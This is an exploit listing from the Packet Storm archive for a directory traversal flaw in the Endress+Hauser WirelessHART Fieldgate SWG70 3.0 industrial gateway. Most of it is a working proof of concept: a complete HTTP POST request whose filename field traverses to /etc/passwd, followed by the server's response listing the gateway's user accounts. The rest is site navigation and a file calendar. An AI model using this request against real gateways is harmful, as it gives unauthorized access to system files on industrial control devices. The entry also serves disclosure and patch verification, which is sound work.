what you don't know can hurt you

WirelessHART Fieldgate SWG70 3.0 Directory Traversal

WirelessHART Fieldgate SWG70 3.0 Directory Traversal
Posted Sep 6, 2018
Authored by Hamit CIBO

WirelessHART Fieldgate SWG70 version 3.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
MD5 | af33723ac7c7484f32d7397e7b8a6f0a

WirelessHART Fieldgate SWG70 3.0 Directory Traversal

Change Mirror Download
# Exploit Title: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Hamit CIBO
# Vendor Homepage: http://endress.com
# Software Link: https://www.endress.com/en/Field-instruments-overview/System-Components-Recorder-Data-Manager/wirelesshart-gateway-fieldgate-swg70
# Version: SWG70 3.X
# Tested on: Windows
# CVE :

# PoC
# Request

POST /fcgi-bin/wgsetcgi HTTP/1.1
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
Referer: {Target}
Cookie: ********
Host: {Target}
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.21(KHTML,like Gecko)Chrome/41.0.2228.0 Safari/537.21
Accept: */*

action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand

# Response

HTTP/1.1 200 OK
Date: Fri, 13 Mar 1970 17:13:58 GMT
Server: Apache
Cache-Control: no-cache
Keep-Alive : timeout=15,max=100
Connection : Keep-Alive
Content-Type : text/plain
Content-Length : 333

root:x:0:0:root:/root:/bin/sh
ftp:x:11:101:ftp user:/home:/bin/false
www:x:12:102:www user:/home:/bin/false
sshd:x:13:100:SSH Server:/var/run/sshd:/bin/false
service:x:500:100:Service User:/home:/bin/sh


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close